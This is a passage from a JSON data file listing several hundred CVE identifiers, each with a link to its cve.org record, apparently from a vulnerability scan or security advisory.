"name": "CVE-2025-38396",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38396"
},
{
"name": "CVE-2025-23161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23161"
},
{
"name": "CVE-2025-38407",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38407"
},
{
"name": "CVE-2025-39994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39994"
},
{
"name": "CVE-2015-4784",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4784"
},
{
"name": "CVE-2025-12119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12119"
},
{
"name": "CVE-2023-4527",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4527"
},
{
"name": "CVE-2025-38493",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38493"
},
{
"name": "CVE-2025-37803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37803"
},
{
"name": "CVE-2025-38670",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38670"
},
{
"name": "CVE-2025-39732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39732"
},
{
"name": "CVE-2024-56433",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
},
{
"name": "CVE-2025-37824",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37824"
},
{
"name": "CVE-2023-34410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34410"
},
{
"name": "CVE-2025-38602",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38602"
},
{
"name": "CVE-2023-4156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4156"
},
{
"name": "CVE-2014-8139",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8139"
},
{
"name": "CVE-2025-47911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47911"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-38003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38003"
},
{
"name": "CVE-2025-38441",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38441"
},
{
"name": "CVE-2025-28162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-28162"
},
{
"name": "CVE-2025-38007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38007"
},
{
"name": "CVE-2025-37923",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37923"
},
{
"name": "CVE-2025-40088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40088"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2022-2519",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2519"
},
{
"name": "CVE-2025-38142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38142"
},
{
"name": "CVE-2022-23990",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23990"
},
{
"name": "CVE-2022-49920",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49920"
},
{
"name": "CVE-2025-37739",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37739"
},
{
"name": "CVE-2022-0530",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0530"
},
{
"name": "CVE-2025-13151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13151"
},
{
"name": "CVE-2025-38478",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38478"
},
{
"name": "CVE-2025-38568",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38568"
},
{
"name": "CVE-2025-38583",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38583"
},
{
"name": "CVE-2025-39788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39788"
},
{
"name": "CVE-2025-22058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22058"
},
{
"name": "CVE-2025-37831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37831"
},
{
"name": "CVE-2025-38499",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38499"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2025-38269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38269"
},
{
"name": "CVE-2025-38079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38079"
},
{
"name": "CVE-2025-37940",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37940"
},
{
"name": "CVE-2022-28391",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28391"
},
{
"name": "CVE-2021-46828",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46828"
},
{
"name": "CVE-2023-2804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2804"
},
{
"name": "CVE-2025-37945",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37945"
},
{
"name": "CVE-2025-6141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6141"
},
{
"name": "CVE-2025-40109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40109"
},
{
"name": "CVE-2024-13978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13978"
},
{
"name": "CVE-2025-38735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38735"
},
{
"name": "CVE-2022-50247",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50247"
},
{
"name": "CVE-2025-40006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40006"
},
{
"name": "CVE-2025-12383",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12383"
},
{
"name": "CVE-2025-38652",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38652"
},
{
"name": "CVE-2025-38110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38110"
},
{
"name": "CVE-2025-38422",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38422"
},
{
"name": "CVE-2025-38402",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38402"
},
{
"name": "CVE-2021-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3520"
},
{
"name": "CVE-2025-39698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39698"
},
{
"name": "CVE-2025-64506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64506"
},
{
"name": "CVE-2025-37915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37915"
},
{
"name": "CVE-2025-6020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6020"
},
{
"name": "CVE-2015-2626",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2626"
},
{
"name": "CVE-2025-23146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23146"
},
{
"name": "CVE-2022-48064",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48064"
},
{
"name": "CVE-2025-37903",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37903"
},
{
"name": "CVE-2025-52881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52881"
},
{
"name": "CVE-2025-23142",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23142"
},
{
"name": "CVE-2020-10029",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10029"
},
{
"name": "CVE-2025-7425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7425"
},
{
"name": "CVE-2022-36227",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36227"
},
{
"name": "CVE-2025-37738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37738"
},
{
"name": "CVE-2025-40011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40011"
},
{
"name": "CVE-2025-21883",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21883"
},
{
"name": "CVE-2025-38303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38303"
},
{
"name": "CVE-2023-29469",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29469"
},
{
"name": "CVE-2024-5535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5535"
},
{
"name": "CVE-2025-38074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38074"
},
{
"name": "CVE-2023-52355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52355"
},
{
"name": "CVE-2025-40085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40085"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-38245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38245"
},
{
"name": "CVE-2025-40231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40231"
},
{
"name": "CVE-2021-36770",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36770"
},
{
"name": "CVE-2025-38324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38324"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2021-36976",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36976"
},
{
"name": "CVE-2025-38018",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38018"
},
{
"name": "CVE-2023-3164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3164"
},
{
"name": "CVE-2022-3597",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3597"
},
{
"name": "CVE-2023-27535",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27535"
},
{
"name": "CVE-2022-27775",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27775"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2025-37830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37830"
},
{
"name": "CVE-2018-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-25032"
},
{
"name": "CVE-2025-3360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3360"
},
{
"name": "CVE-2025-38614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38614"
},
{
"name": "CVE-2025-37991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37991"
},
{
"name": "CVE-2026-22796",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22796"
},
{
"name": "CVE-2025-64720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64720"
},
{
"name": "CVE-2025-38425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38425"
},
{
"name": "CVE-2022-3970",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3970"
},
{
"name": "CVE-2025-9165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9165"
},
{
"name": "CVE-2023-30571",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30571"
},
{
"name": "CVE-2022-50249",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50249"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2025-37978",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37978"
},
{
"name": "CVE-2025-37781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37781"
},
{
"name": "CVE-2024-5642",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5642"
},
{
"name": "CVE-2024-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3219"
},
{
"name": "CVE-2015-4781",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4781"
},
{
"name": "CVE-2025-38210",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38210"
},
{
"name": "CVE-2025-38542",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38542"
},
{
"name": "CVE-2025-38664",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38664"
},
{
"name": "CVE-2025-38344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38344"
},
{
"name": "CVE-2025-23145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23145"
},
{
"name": "CVE-2025-23143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23143"
},
{
"name": "CVE-2021-3999",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3999"
},
{
"name": "CVE-2023-53182",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53182"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2025-38088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38088"
},
{
"name": "CVE-2025-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23141"
},
{
"name": "CVE-2025-37823",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37823"
},
{
"name": "CVE-2022-27774",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27774"
},
{
"name": "CVE-2025-38332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38332"
},
{
"name": "CVE-2025-38386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38386"
},
{
"name": "CVE-2025-61732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61732"
},
{
"name": "CVE-2017-3605",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3605"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2025-38385",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38385"
},
{
"name": "CVE-2022-40303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40303"
},
{
"name": "CVE-2025-11083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11083"
},
{
"name": "CVE-2025-37952",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37952"
},
{
"name": "CVE-2023-45803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2023-0801",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0801"
},
{
"name": "CVE-2025-38694",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38694"
},
{
"name": "CVE-2025-37793",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37793"
},
{
"name": "CVE-2020-10543",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10543"
},
{
"name": "CVE-2025-1377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1377"
},
{
"name": "CVE-2025-37740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37740"
},
{
"name": "CVE-2025-38676",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38676"
},
{
"name": "CVE-2025-38530",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38530"
},
{
"name": "CVE-2022-4645",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4645"
},
{
"name": "CVE-2025-38174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38174"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-37826",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37826"
},
{
"name": "CVE-2025-37986",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37986"
},
{
"name": "CVE-2025-37829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37829"
},
{
"name": "CVE-2025-46394",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46394"
},
{
"name": "CVE-2025-66471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
},
{
"name": "CVE-2025-38409",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38409"
},
{
"name": "CVE-2025-6170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6170"
},
{
"name": "CVE-2022-3479",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3479"
},
{
"name": "CVE-2021-35937",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35937"
},
{
"name": "CVE-2025-9900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9900"
},
{
"name": "CVE-2025-40183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40183"
},
{
"name": "CVE-2025-38019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38019"
},
{
"name": "CVE-2025-38729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38729"
},
{
"name": "CVE-2025-14017",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14017"
},
{
"name": "CVE-2023-40745",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40745"
},
{
"name": "CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-23151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23151"
},
{
"name": "CVE-2025-38037",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38037"
},
{
"name": "CVE-2017-3609",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3609"
},
{
"name": "CVE-2025-39998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39998"
},
{
"name": "CVE-2014-9636",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9636"
},
{
"name": "CVE-2025-13836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13836"
},
{
"name": "CVE-2017-3611",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3611"
},
{
"name": "CVE-2022-2521",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2521"
},
{
"name": "CVE-2023-28321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28321"
},
{
"name": "CVE-2025-37796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37796"
},
{
"name": "CVE-2025-37962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37962"
},
{
"name": "CVE-2026-1002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1002"
},
{
"name": "CVE-2025-40134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40134"
},
{
"name": "CVE-2025-38681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38681"
},
{
"name": "CVE-2023-25435",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25435"
},
{
"name": "CVE-2025-37799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37799"
},
{
"name": "CVE-2022-29155",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29155"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2025-38593",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38593"
},
{
"name": "CVE-2026-25210",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25210"
},
{
"name": "CVE-2022-2309",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2309"
},
{
"name": "CVE-2025-39968",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39968"
},
{
"name": "CVE-2023-33285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33285"
},
{
"name": "CVE-2024-52533",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52533"
},
{
"name": "CVE-2025-38342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38342"
},
{
"name": "CVE-2025-65018",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-65018"
},
{
"name": "CVE-2025-39795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39795"
},
{
"name": "CVE-2015-4777",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4777"
},
{
"name": "CVE-2025-37801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37801"
},
{
"name": "CVE-2025-7039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
},
{
"name": "CVE-2025-38167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38167"
},
{
"name": "CVE-2025-37883",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37883"
},
{
"name": "CVE-2025-37863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37863"
},
{
"name": "CVE-2023-0687",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0687"
},
{
"name": "CVE-2025-37901",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37901"
},
{
"name": "CVE-2025-38687",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38687"
},
{
"name": "CVE-2022-32221",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32221"
},
{
"name": "CVE-2025-37811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37811"
},
{
"name": "CVE-2022-37434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37434"
},
{
"name": "CVE-2025-38257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38257"
},
{
"name": "CVE-2022-29458",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29458"
},
{
"name": "CVE-2023-5156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5156"
},
{
"name": "CVE-2025-22104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22104"
},
{
"name": "CVE-2025-37864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37864"
},
{
"name": "CVE-2021-32256",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32256"
},
{
"name": "CVE-2025-38307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38307"
},
{
"name": "CVE-2025-11081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11081"
},
{
"name": "CVE-2025-55163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
},
{
"name": "CVE-2025-37916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37916"
},
{
"name": "CVE-2025-38111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38111"
},
{
"name": "CVE-2025-39986",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39986"
},
{
"name": "CVE-2026-22184",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22184"
},
{
"name": "CVE-2025-37767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37767"
},
{
"name": "CVE-2025-5918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
},
{
"name": "CVE-2025-39955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39955"
},
{
"name": "CVE-2025-66293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66293"
},
{
"name": "CVE-2017-3614",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3614"
},
{
"name": "CVE-2025-37989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37989"
},
{
"name": "CVE-2025-38529",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38529"
},
{
"name": "CVE-2025-38326",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38326"
},
{
"name": "CVE-2025-38055",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38055"
},
{
"name": "CVE-2025-12818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12818"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2025-32990",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32990"
},
{
"name": "CVE-2025-38384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38384"
},
{
"name": "CVE-2025-38334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38334"
},
{
"name": "CVE-2025-38728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38728"
},
{
"name": "CVE-2025-38424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38424"
},
{
"name": "CVE-2025-38430",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38430"
},
{
"name": "CVE-2025-38715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38715"
},
{
"name": "CVE-2021-22897",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22897"
},
{
"name": "CVE-2025-39734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39734"
},
{
"name": "CVE-2025-38089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38089"
},
{
"name": "CVE-2025-40078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40078"
},
{
"name": "CVE-2025-38382",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38382"
},
{
"name": "CVE-2025-15366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15366"
},
{
"name": "CVE-2023-2603",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2603"
},
{
"name": "CVE-2025-38608",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38608"
},
{
"name": "CVE-2025-38650",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38650"
},
{
"name": "CVE-2025-4802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4802"
},
{
"name": "CVE-2025-39710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39710"
},
{
"name": "CVE-2025-40116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40116"
},
{
"name": "CVE-2025-68249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68249"
},
{
"name": "CVE-2026-0990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0990"
},
{
"name": "CVE-2025-38124",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38124"
},
{
"name": "CVE-2025-39934",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39934"
},
{
"name": "CVE-2025-37925",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37925"
},
{
"name": "CVE-2026-0865",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0865"
},
{
"name": "CVE-2024-9143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
},
{
"name": "CVE-2023-0799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0799"
},
{
"name": "CVE-2020-12723",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12723"
},
{
"name": "CVE-2025-39683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39683"
},
{
"name": "CVE-2025-38420",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38420"
},
{
"name": "CVE-2025-38071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38071"
},
{
"name": "CVE-2021-3521",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3521"
},
{
"name": "CVE-2025-40179",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40179"
},
{
"name": "CVE-2025-37972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37972"
},
{
"name": "CVE-2025-38183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38183"
},
{
"name": "CVE-2025-40127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40127"
},
{
"name": "CVE-2025-37768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37768"
},
{
"name": "CVE-2025-39794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39794"
},
{
"name": "CVE-2025-38160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38160"
},
{
"name": "CVE-2024-33601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33601"
},
{
"name": "CVE-2025-32989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32989"
},
{
"name": "CVE-2022-48063",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48063"
},
{
"name": "CVE-2024-53589",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53589"
},
{
"name": "CVE-2025-37984",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37984"
},
{
"name": "CVE-2025-38528",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38528"
},
{
"name": "CVE-2025-39996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39996"
},
{
"name": "CVE-2025-37856",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37856"
},
{
"name": "CVE-2025-38107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38107"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2023-32181",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32181"
},
{
"name": "CVE-2025-38292",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38292"
},
{
"name": "CVE-2025-40053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40053"
},
{
"name": "CVE-2025-38085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38085"
},
{
"name": "CVE-2026-24515",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
},
{
"name": "CVE-2025-38222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38222"
},
{
"name": "CVE-2025-38010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38010"
},
{
"name": "CVE-2025-38197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38197"
},
{
"name": "CVE-2025-39951",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39951"
},
{
"name": "CVE-2025-38468",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38468"
},
{
"name": "CVE-2022-1271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1271"
},
{
"name": "CVE-2025-40120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40120"
},
{
"name": "CVE-2024-28085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28085"
},
{
"name": "CVE-2025-11495",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11495"
},
{
"name": "CVE-2025-38688",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38688"
},
{
"name": "CVE-2025-38333",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38333"
},
{
